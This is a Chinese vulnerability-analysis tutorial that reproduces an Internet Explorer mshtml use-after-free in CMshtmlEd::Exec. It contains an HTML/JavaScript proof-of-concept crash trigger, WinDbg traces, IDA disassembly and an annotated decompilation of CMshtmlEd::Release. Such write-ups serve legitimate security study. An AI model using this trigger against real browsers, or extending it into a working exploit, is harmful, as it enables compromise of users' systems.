浏览器漏洞利用实战


      请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!

01
漏洞复现

漏洞环境:

Win7 32

Windbg

IDA6.8

POC:

<html><body><script>var arrr = newArray();      arrr[0] = window.document.createElement("img");      arrr[0]["src"] = "f";</script><iframesrc="./payload.html"></iframe></body></html>
<HTML><script>functionfuncB() {document.execCommand("selectAll");      };functionfuncA() {document.write("B");        parent.arrr[0].src = "YMjfu0c08u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";      }</script><bodyonload='funcB();'onselect='funcA()'><divcontenteditable='true'>        a</div></body></HTML>

方法一:

0:013> gModLoad: 6b560000 6b612000   C:WindowsSystem32jscript.dll(6a8.cd0): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=00677dc0 edx=0000000d esi=00000000 edi=0c0c0c08eip=63cd5041 esp=02499c64 ebp=02499c70 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206mshtml!CMshtmlEd::Exec+0x134:63cd5041 8b07            mov     eax,dword ptr [edi]  ds:0023:0c0c0c08=????????

edi所指向的值无效,且崩溃发生在CMshtmlEd::Exec中,我们打开IDA查看一下这个函数的逻辑

我们用 IDA 加载 mshtml.dll,查找 CMshtmlEd::Exec 函数,找到导致崩溃的这条指令

.text:74E64FAF ; public: virtual long __stdcall CMshtmlEd::Exec(struct _GUID const *, unsigned long, unsigned long, struct tagVARIANT *, struct tagVARIANT *).text:74E64FAF ?Exec@CMshtmlEd@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z proc near.text:74E64FAF                                         ; DATA XREF: .text:74DDA4D8o.text:74E64FAF.text:74E64FAF arg_0           = dword ptr  8.text:74E64FAF arg_4           = dword ptr  0Ch.text:74E64FAF arg_8           = dword ptr  10h.text:74E64FAF arg_C           = dword ptr  14h.text:74E64FAF arg_10          = dword ptr  18h.text:74E64FAF arg_14          = dword ptr  1Ch.text:74E64FAF.text:74E64FAF ; FUNCTION CHUNK AT .text:74EFDCED SIZE 000000AB BYTES.text:74E64FAF.text:74E64FAF                 mov     edi, edi.text:74E64FB1                 push    ebp.text:74E64FB2                 mov     ebp, esp.text:74E64FB4                 push    ebx.text:74E64FB5                 push    esi.text:74E64FB6                 push    edi.text:74E64FB7                 mov     edi, [ebp+arg_0].text:74E64FBA                 mov     eax, [edi+8].text:74E64FBD                 mov     ecx, [eax].text:74E64FBF                 push    eax.text:74E64FC0                 mov     esi, 80040100h.text:74E64FC5                 call    dword ptr [ecx+4].text:74E64FC8                 cmp     [ebp+arg_C], 3.text:74E64FCC                 jz      short loc_74E6503E.text:74E64FCE                 mov     ebx, [ebp+arg_8].text:74E64FD1                 cmp     ebx, 90Eh.text:74E64FD7                 jnz     loc_74EFDCED.text:74E64FDD.text:74E64FDD loc_74E64FDD:                           ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+98D4Aj.text:74E64FDD                 push    [ebp+arg_14].text:74E64FE0                 mov     eax, [edi+8].text:74E64FE3                 push    [ebp+arg_10].text:74E64FE6                 push    [ebp+arg_C].text:74E64FE9                 push    ebx.text:74E64FEA                 push    
[ebp+arg_4].text:74E64FED                 call    ?InternalExec@CHTMLEditor@@QAEJPBU_GUID@@KKPAUtagVARIANT@@1@Z ; CHTMLEditor::InternalExec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *).text:74E64FF2                 mov     esi, eax.text:74E64FF4                 test    esi, esi.text:74E64FF6                 jl      short loc_74E6503E.text:74E64FF8                 jz      short loc_74E6503E.text:74E64FFA                 mov     eax, 91Ch.text:74E64FFF                 cmp     ebx, eax.text:74E65001                 jnb     loc_74EFDD04.text:74E65007.text:74E65007 loc_74E65007:                           ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+98D5Aj.text:74E65007                 push    [ebp+arg_10].text:74E6500A                 push    ebx.text:74E6500B                 push    [ebp+arg_C].text:74E6500E                 call    ?IsDialogCommand@CMshtmlEd@@AAEHKKPAUtagVARIANT@@@Z ; CMshtmlEd::IsDialogCommand(ulong,ulong,tagVARIANT *).text:74E65013                 test    eax, eax.text:74E65015                 mov     eax, [edi+8].text:74E65018                 mov     eax, [eax+50h].text:74E6501B                 jnz     loc_74EFDD91.text:74E65021.text:74E65021 loc_74E65021:                           ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+98DE4j.text:74E65021                 push    ebx.text:74E65022call    ?Get@CCommandTable@@QAEPAVCCommand@@K@Z ; CCommandTable::Get(ulong).text:74E65027                 test    eax, eax.text:74E65029                 jz      short loc_74E65050.text:74E6502B                 push    edi.text:74E6502C                 push    [ebp+arg_14].text:74E6502F                 mov     esi, eax.text:74E65031                 push    [ebp+arg_10].text:74E65034                 push    [ebp+arg_C].text:74E65037call    ?Exec@CCommand@@QAEJKPAUtagVARIANT@@0PAVCMshtmlEd@@@Z ; CCommand::Exec(ulong,tagVARIANT *,tagVARIANT *,CMshtmlEd *).text:74E6503C                 mov   
  esi, eax.text:74E6503E.text:74E6503E loc_74E6503E:                           ; CODE XREF: CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+1Dj.text:74E6503E                                         ; CMshtmlEd::Exec(_GUID const *,ulong,ulong,tagVARIANT *,tagVARIANT *)+47j ....text:74E6503E                 mov     edi, [edi+8].text:74E65041                 mov     eax, [edi].text:74E65043                 push    edi.text:74E65044call    dword ptr [eax+8].text:74E65047                 mov     eax, esi

因为 Win7 开启了 ASLR,模块基址每次加载都不同,所以只需比较地址的后四位:IDA 中的 74E65041 即对应 Windbg 中的 63cd5041

之所以在 Windbg 中会崩溃,是因为 edi 所指向的值无效;而在 IDA 中由 .text:74E64FB7 mov edi, [ebp+arg_0] 可以看到,edi 的值来自 ebp+arg_0

PS:ebp+arg_0在C中指的是最后一个入栈的参数,即从左往右数第一个参数

在调试堆漏洞时,一般会开启页堆,方便调试

直接在Windbg命令行中运行命令(直接在Windbg中运行gflag可能会导致后面!heap命令无效,推荐在Windbg目录下使用命令行gflags.exe /i iexplore.exe +hpa +ust)

0:005>!gflag +hpa +ustNew NtGlobalFlag contents: 0x02001000    ust -Createuser mode stack trace database    hpa - Place heap allocations at ends of pages

下断点,重新触发崩溃

0:013> bp mshtml!CMshtmlEd::Exec0:013> gModLoad: 6a260000 6a312000   C:WindowsSystem32jscript.dllBreakpoint0 hiteax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204faf esp=04539c04 ebp=04539c30 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec:66204faf 8bff            mov     edi,edi0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb1 esp=04539c04 ebp=04539c30 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x2:66204fb1 55              push    ebp0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb2 esp=04539c00 ebp=04539c30 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x3:66204fb2 8bec            mov     ebp,esp0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb4 esp=04539c00 ebp=04539c00 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x5:66204fb4 53              push    ebx0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb5 esp=04539bfc ebp=04539c00 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x6:66204fb5 56              push    esi0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=661b8eaceip=66204fb6 esp=04539bf8 ebp=04539c00 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x7:66204fb6 57              push    edi0:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 
edi=661b8eaceip=66204fb7 esp=04539bf4 ebp=04539c00 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x8:66204fb7 8b7d08          mov     edi,dword ptr [ebp+8ss:0023:04539c08=07d94f780:005> peax=07d94f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=08089ff0 edi=07d94f78eip=66204fba esp=04539bf4 ebp=04539c00 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0xb:66204fba 8b4708          mov     eax,dword ptr [edi+8ds:0023:07d94f80=07fc4f200:005> !heap -p -a edi    address 07d94f78 found in    _DPH_HEAP_ROOT @ 12f1000in busy allocation (  DPH_HEAP_BLOCK:         UserAddrUserSize -         VirtAddrVirtSize)                                 7b62b2c:          7d94f78               88 -          7d94000             2000          mshtml!CMshtmlEd::`vftable'    6fe78e89 verifier!AVrfDebugPageHeapAllocate+0x00000229    770b5e26 ntdll!RtlDebugAllocateHeap+0x00000030    7707a376 ntdll!RtlpAllocateHeap+0x000000c4    77045ae0 ntdll!RtlAllocateHeap+0x0000023a    6612a5f8 mshtml!CHTMLEditor::AddCommandTarget+0x00000020    6629c119 mshtml!CHTMLEditor::GetCommandTarget+0x00000094    66203945 mshtml!CHTMLEditorProxy::GetCommandTarget+0x0000001e    661d843d mshtml!CEditRouter::SetInternalEditHandler+0x00000064    661d7f69 mshtml!CEditRouter::ExecEditCommand+0x000000d5    661b3888 mshtml!CDoc::ExecHelper+0x00003cdb    662f5397 mshtml!CDocument::Exec+0x00000024    663350f6 mshtml!CBase::execCommand+0x00000053    662f7090 mshtml!CDocument::execCommand+0x00000094    6632e043 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x0000014e    661ef10b mshtml!CBase::ContextInvokeEx+0x000005dc    661eef72 mshtml!CBase::InvokeEx+0x00000025    661fb7fa mshtml!DispatchInvokeCollection+0x0000014c    6619f00c mshtml!CDocument::InvokeEx+0x000000f0    6619bc52 mshtml!CBase::VersionedInvokeEx+0x00000020    6619bc0e 
mshtml!PlainInvokeEx+0x000000eb    6a26a26e jscript!IDispatchExInvokeEx2+0x00000104    6a26a1b9 jscript!IDispatchExInvokeEx+0x0000006a    6a26a43a jscript!InvokeDispatchEx+0x00000098    6a26a4e4 jscript!VAR::InvokeByName+0x00000139    6a27d9a8 jscript!VAR::InvokeDispName+0x0000007d    6a27da4f jscript!VAR::InvokeByDispID+0x000000ce    6a27e4c7 jscript!CScriptRuntime::Run+0x00002b80    6a275d7d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce    6a275cdb jscript!ScrFncObj::Call+0x0000008d    6a275ef1 jscript!CSession::Execute+0x0000015f    6a26f4c6 jscript!NameTbl::InvokeDef+0x000001b5    6a26eb02 jscript!NameTbl::InvokeEx+0x0000012c0:005> dps edi07d94f78  6617a4c8 mshtml!CMshtmlEd::`vftable'07d94f7c  0000000207d94f80  07fc4f2007d94f84  0738ffc007d94f88  07842fd807d94f8c  0000000007d94f90  0000000007d94f94  0000000007d94f98  0000000007d94f9c  0000000007d94fa0  0000000007d94fa4  0000000007d94fa8  0000000007d94fac  0000000007d94fb0  0000000007d94fb4  0000000007d94fb8  0000000007d94fbc  0000000007d94fc0  0000000007d94fc4  0000000007d94fc8  0000000007d94fcc  0000000007d94fd0  0000000007d94fd4  0000000007d94fd8  0000000007d94fdc  0000000007d94fe0  0000000007d94fe4  0000000007d94fe8  0000000007d94fec  07d94f7807d94ff0  0000000007d94ff4  000000000:005> g(f64.7a8): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=00000000 ebx=0000001f ecx=07fc4f30 edx=0000000d esi=00000000 edi=07d94f78eip=6620503e esp=04539bf4 ebp=04539c00 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206mshtml!CMshtmlEd::Exec+0x131:6620503e 8b7f08          mov     edi,dword ptr [edi+8] ds:0023:07d94f80=????????

按 g 继续后再次停下时,edi+8 所指向的已经是一个无效的值。这是一个典型的释放后重用(Use-After-Free)过程:edi 所指向的对象在两次执行之间已经被 free 了

我们查看一下mshtml!CMshtmlEd中的其他函数,看看是否有相关函数可以释放这个对象

0:005> x mshtml!CMshtmlEd::*6620352b mshtml!CMshtmlEd::Release=<no type information>662038cd mshtml!CMshtmlEd::QueryInterface=<no type information>6612a635 mshtml!CMshtmlEd::Initialize=<no type information>6617a5d9 mshtml!CMshtmlEd::AddRef=<no type information>6617a4c8 mshtml!CMshtmlEd::`vftable' =<no type information>66204ee2 mshtml!CMshtmlEd::IsDialogCommand=<no type information>6616e118 mshtml!CMshtmlEd::QueryStatus=<no type information>65fe16e3 mshtml!CMshtmlEd::GetSegmentList=<no type information>66204faf mshtml!CMshtmlEd::Exec=<no type information>6612a98d mshtml!CMshtmlEd::CMshtmlEd=<no type information>6621cd5b mshtml!CMshtmlEd::~CMshtmlEd=<no type information>

从名字看,mshtml!CMshtmlEd::Release 应该是负责释放这个对象的函数,用 IDA 的 F5 反编译查看一下这个函数

// Hex-Rays output (as quoted in the article) for CMshtmlEd::Release, the
// IUnknown::Release of the editor command-target object. The DWORD at object
// offset +4 is the reference count: the WinDbg trace above shows this same
// field as `dec dword ptr [esi+4]`, and the constructor below sets it to 1.
// NOTE(review): the decompiler shows `this` and `lpMem` as two parameters, but
// the assembly loads a single pointer from [ebp+8] and uses it for both the
// destructor and HeapFree — they are presumably the same object; verify.
int __thiscall CMshtmlEd::Release(CMshtmlEd *this, LPVOID lpMem)
{
  bool v2; // zf@1
  int result; // eax@1

  // Post-decrement: v2 is true only when the count was 1 before the
  // decrement, i.e. this call dropped the last reference.
  v2 = (*((_DWORD *)lpMem + 1))-- == 1;
  result = *((_DWORD *)lpMem + 1); // new count, returned when the object survives
  if ( v2 )
  {
    // Last owner gone: destroy and hand the block back to the process heap.
    // Any frame still holding this pointer — CMshtmlEd::Exec in the crash
    // trace above, which re-reads [this+8] after the nested command execution
    // that (per the !heap stack) led here — is now reading freed memory. That
    // is the use-after-free the article tracks down; the fix presumably belongs
    // with the caller (keep a reference alive across the call), not here.
    CMshtmlEd::~CMshtmlEd(this);
    HeapFree(g_hProcessHeap, 0, lpMem);
    result = 0;
  }
  return result;
}

可以看到代码中的HeapFree(g_hProcessHeap, 0, lpMem);

这里必定有释放操作。我们在 Windbg 中跟踪一下:首先停止调试,然后重新运行到上面第一次 Exec 断点处

0:016> bp mshtml!CMshtmlEd::Exec0:016> gModLoad: 6b560000 6b612000   C:WindowsSystem32jscript.dllBreakpoint0 hiteax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204faf esp=04699cb4 ebp=04699ce0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec:66204faf 8bff            mov     edi,edi0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb1 esp=04699cb4 ebp=04699ce0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x2:66204fb1 55              push    ebp0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb2 esp=04699cb0 ebp=04699ce0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x3:66204fb2 8bec            mov     ebp,esp0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb4 esp=04699cb0 ebp=04699cb0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x5:66204fb4 53              push    ebx0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb5 esp=04699cac ebp=04699cb0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x6:66204fb5 56              push    esi0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=661b8eaceip=66204fb6 esp=04699ca8 ebp=04699cb0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x7:66204fb6 57              push    edi0:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 
edi=661b8eaceip=66204fb7 esp=04699ca4 ebp=04699cb0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0x8:66204fb7 8b7d08          mov     edi,dword ptr [ebp+8ss:0023:04699cb8=082c3f780:005> peax=082c3f78 ebx=00000000 ecx=6617a4c8 edx=00000000 esi=07f84ff0 edi=082c3f78eip=66204fba esp=04699ca4 ebp=04699cb0 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Exec+0xb:66204fba 8b4708          mov     eax,dword ptr [edi+8ds:0023:082c3f80=080acf20

然后在此时加一个Release的断点,按g运行

0:005> bp mshtml!CMshtmlEd::Release0:005> gBreakpoint 1 hiteax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=6620352b esp=04696130 ebp=04696198 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release:66203528bff            mov     edi,edi

我们单步跟踪,看看 esi 所指的对象是在哪里被 free 的

0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=6620352d esp=04696130 ebp=04696198 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x2:6620352d 55              push    ebp0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=6620352e esp=0469612c ebp=04696198 iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x3:6620352e 8bec            mov     ebp,esp0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=66203530 esp=0469612c ebp=0469612c iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x5:6620353056              push    esi0:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=07f84ff0 edi=00000000eip=66203531 esp=04696128 ebp=0469612c iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x6:66203531 8b7508          mov     esi,dword ptr [ebp+8ss:0023:04696134=082c3f780:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=66203534 esp=04696128 ebp=0469612c iopl=0         nv up ei pl nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206mshtml!CMshtmlEd::Release+0x9:66203534 ff4e04          dec     dword ptr [esi+4]    ds:0023:082c3f7c=000000020:005> peax=082c3f78 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=66203537 esp=04696128 ebp=0469612c iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0xc:66203537 8b4604          mov     eax,dword ptr [esi+4ds:0023:082c3f7c=000000010:005> peax=00000001 ebx=071c7680 
ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=6620353a esp=04696128 ebp=0469612c iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0xf:6620353a 0f84fb970100    je      mshtml!CMshtmlEd::Release+0x11 (6621cd3b) [br=0]0:005> peax=00000001 ebx=071c7680 ecx=6617a4c8 edx=0000001a esi=082c3f78 edi=00000000eip=66203540 esp=04696128 ebp=0469612c iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x27:66203540 5e              pop     esi0:005> dps esi082c3f78  6617a4c8 mshtml!CMshtmlEd::`vftable'082c3f7c  00000001082c3f80  080acf20082c3f84  07f22fc0082c3f88  0589efd8082c3f8c  00000000082c3f90  00000000082c3f94  00000000082c3f98  00000000082c3f9c  00000000082c3fa0  00000000082c3fa4  00000000082c3fa8  00000000082c3fac  00000000082c3fb0  00000000082c3fb4  00000000082c3fb8  00000000082c3fbc  00000000082c3fc0  00000000082c3fc4  00000000082c3fc8  00000000082c3fcc  00000000082c3fd0  00000000082c3fd4  00000000082c3fd8  00000000082c3fdc  00000000082c3fe0  00000000082c3fe4  00000000082c3fe8  00000000082c3fec  082c3f78082c3ff0  00000000082c3ff4  00000000

可以看到 6620353a 处的 je 并没有跳转(引用计数从 2 减到 1,还没有归零),所以这次不会走到释放路径,直接按 g 继续

0:005> gBreakpoint1 hiteax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620352b esp=046960b0 ebp=046960c4 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release:6620352b 8bff            mov     edi,edi0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620352d esp=046960b0 ebp=046960c4 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x2:6620352d 55              push    ebp0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620352e esp=046960ac ebp=046960c4 iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x3:6620352e 8bec            mov     ebp,esp0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203530 esp=046960ac ebp=046960ac iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x5:6620353056              push    esi0:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203531 esp=046960a8 ebp=046960ac iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x6:66203531 8b7508          mov     esi,dword ptr [ebp+8ss:0023:046960b4=082c3f780:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=66203534 esp=046960a8 ebp=046960ac iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x9:66203534 ff4e04          dec     dword ptr [esi+4]    ds:0023:082c3f7c=000000010:005> peax=6617a4c8 ebx=080acf8c ecx=00000001 edx=080acf8c 
esi=082c3f78 edi=00000001eip=66203537 esp=046960a8 ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0xc:66203537 8b4604          mov     eax,dword ptr [esi+4ds:0023:082c3f7c=000000000:005> peax=00000000 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6620353a esp=046960a8 ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0xf:6620353a 0f84fb970100    je      mshtml!CMshtmlEd::Release+0x11 (6621cd3b) [br=1]0:005> peax=00000000 ebx=080acf8c ecx=00000001 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd3b esp=046960a8 ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x11:6621cd3b e81b000000      call    mshtml!CMshtmlEd::~CMshtmlEd (6621cd5b)0:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd40 esp=046960a8 ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x16:6621cd40 56              push    esi0:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd41 esp=046960a4 ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x17:6621cd41 6a00            push    00:005> peax=00000000 ebx=080acf8c ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd43 esp=046960a0 ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x19:6621cd43 ff3518844f66    push    dword ptr [mshtml!g_hProcessHeap (664f8418)] ds:0023:664f8418=000500000:005> peax=00000000 ebx=080acf8c 
ecx=00000000 edx=080acf8c esi=082c3f78 edi=00000001eip=6621cd49 esp=0469609c ebp=046960ac iopl=0         nv up ei pl zr na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246mshtml!CMshtmlEd::Release+0x1f:6621cd49 ff15fc12fc65    call    dword ptr [mshtml!_imp__HeapFree (65fc12fc)] ds:0023:65fc12fc={kernel32!HeapFree (7601bbd0)}0:005> peax=00000001 ebx=080acf8c ecx=77046570 edx=00051078 esi=082c3f78 edi=00000001eip=6621cd4f esp=046960a8 ebp=046960ac iopl=0         nv up ei pl nz na po nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202mshtml!CMshtmlEd::Release+0x25:6621cd4f 33c0            xor     eax,eax0:005> dps esi082c3f78  ????????082c3f7c  ????????082c3f80  ????????082c3f84  ????????082c3f88  ????????082c3f8c  ????????082c3f90  ????????082c3f94  ????????082c3f98  ????????082c3f9c  ????????082c3fa0  ????????082c3fa4  ????????082c3fa8  ????????082c3fac  ????????082c3fb0  ????????082c3fb4  ????????082c3fb8  ????????082c3fbc  ????????082c3fc0  ????????082c3fc4  ????????082c3fc8  ????????082c3fcc  ????????082c3fd0  ????????082c3fd4  ????????082c3fd8  ????????082c3fdc  ????????082c3fe0  ????????082c3fe4  ????????082c3fe8  ????????082c3fec  ????????082c3ff0  ????????082c3ff4  ????????0:005> !heap -p -a esi    address 082c3f78 found in    _DPH_HEAP_ROOT @ 51000in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddrVirtSize)                                    8320b60:          82c3000             2000    732e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2    770b65f4 ntdll!RtlDebugFreeHeap+0x0000002f    7707a0aa ntdll!RtlpFreeHeap+0x0000005d    770465a6 ntdll!RtlFreeHeap+0x00000142    7601bbe4 kernel32!HeapFree+0x00000014    6621cd4f mshtml!CMshtmlEd::Release+0x0000002566420391 mshtml!CHTMLEditor::DeleteCommandTarget+0x00000034    6641bd3a mshtml!CHTMLEditor::RemoveContainer+0x0000015f    6629c0e7 mshtml!CHTMLEditor::Notify+0x00000026    662045c6 mshtml!CHTMLEditorProxy::Notify+0x00000021    661b344e 
